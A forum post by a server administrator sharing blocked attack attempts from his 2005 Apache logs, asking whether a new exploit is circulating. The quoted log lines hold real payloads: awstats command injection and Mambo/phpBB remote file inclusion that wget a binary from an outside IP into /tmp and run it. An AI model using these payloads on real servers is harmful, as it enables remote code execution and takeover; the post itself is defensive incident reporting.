Is there a new exploit / bug out there?

I Was going through my error_log and access_log in /var/log/httpd and I'm noticing that there are a slew of compromised hosts out there running a script and trying to grab / execute / exploit some comming things that people would be running. For instance:

Code: 
<edit ip out> - - [19/Dec/2005:12:16:31 -0600] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:12:16:20 -0600] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:12:16:22 -0600] "POST /drupal/xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:12:16:23 -0600] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:12:16:24 -0600] "POST /wordpress/xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:12:16:25 -0600] "POST /xmlrpc.php HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

and that's just one of 200 hosts trying that in my access_log. I also have: 

<edit ip out> - - [19/Dec/2005:15:11:47 -0600] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:15:11:51 -0600] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:15:11:56 -0600] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2065%2e218%2e1%2e216%2fnikons%3bchmod%20%2bx%20nikons%3b%2e%2fnikons;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [18/Dec/2005:16:29:00 -0600] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBAL
S=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20<edit ip out>/listen;chmod%20744%20listen;.
/listen;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [18/Dec/2005:16:29:02 -0600] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&
GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20<edit ip out>/listen;chmod%20744%20li
sten;./listen;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [18/Dec/2005:16:29:04 -0600] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOB
ALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20<edit ip out>/listen;chmod%20744%20listen
;./listen;echo%20YYY;echo|  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:00:51:46 -0600] "GET /modules/Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_p
ath=http://<edit ip out>/cmd.gif?&cmd=cd%20/tmp;wget%20216.15.209.4/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|
  HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

<edit ip out> - - [19/Dec/2005:00:51:48 -0600] "GET /Forums/admin/admin_styles.phpadmin_styles.php?phpbb_root_path=http
://<edit ip out>/cmd.gif?&cmd=cd%20/tmp;wget%20<edit ip out>/criman;chmod%20744%20criman;./criman;echo%20YYY;echo|  HTTP/1
.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; )"

and finally one example from my error_log

[Sun Dec 18 16:28:51 2005] [error] [client <edit ip out>/ mod_security: Access denied with code 403. Pattern match "wget\\
\\x20" at REQUEST_URI [hostname "<edit ip out>"] [uri "/cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GL
OBALS=&mosConfig_absolute_path=http://<edit ip out>/cmd.gif?&cmd=cd%20/tmp;wget%20<edit ip out>/listen;chmod%20744%20list
en;./listen;echo%20YYY;echo|"]
I know the first set is the XMLRPC stuff in PHP. The others are equally as bothersome but not sure what's up with those. Anyways, good news is that none of this is affecting my server other than it's ballooning my logs. Access-wise I'm fairly secure and nothing extra or nasty showing up to make my life miserable. What's really unfortunate is that 2 of the IPs that are hitting me are owned by fairly reputable hosts here on WHT. No, I'm not gonna bag on them because things happen. I've emailed their abuse departments and will give them 24 hours to fix it before I get nasty with them. Anyways, heads up. Might be old news but might be something new.

PS: sorry I screwed up the sizing of the screen, stupid URLs with long characters, not my intention...

 

 

 

 

Top